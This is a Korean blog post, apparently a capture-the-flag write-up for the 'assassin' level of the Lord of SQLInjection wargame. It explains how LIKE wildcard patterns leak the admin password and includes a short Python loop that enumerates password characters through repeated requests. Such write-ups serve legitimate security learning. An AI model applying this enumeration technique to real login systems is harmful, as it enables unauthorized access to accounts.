선릉역 1번 출구
LORD OF SQLINJECTION - assassin 본문
해석하면 result의 id값이 admin일 때 solve되는데, admin의 pw를 구해야할 것 같다.
먼저 pw like '________'로 query를 했더니 Hello guest가 떴다. 왠지 admin의 password length도 8일 것 같다.
그럼 python을 사용해서 guest와 admin의 password가 다를 때를 출력해보도록 하자.
| for i in range(33, 127): query = "pw=__{}%".format(chr(i)) r = requests.get(url+query, headers = headers) if "Hello admin" in r.text: print(chr(i)) break |
처음에는 {}%로 주었다가 한개씩 _를 앞에 추가해서 admin이 출력되는 pw를 찾았더니 2가 출력되었다.
그럼 admin의 pw가 __2%의 형태 다시 말하면 __2_____라는 것을 알 수있다.
clear
'Hacking & Security > Web_hacking 문제풀이' 카테고리의 다른 글
| LORD OF SQLINJECTION - zombie_assassin (0) | 2021.08.20 |
|---|---|
| LORD OF SQLINJECTION - succubus (0) | 2021.08.20 |
| LORD OF SQLINJECTION - giant (0) | 2021.08.20 |
| Webhacking_35 문제풀이 (0) | 2021.08.20 |
| Webhacking_3 문제풀이 (0) | 2021.08.20 |
'Hacking & Security/Web_hacking 문제풀이' Related Articles
more
Comments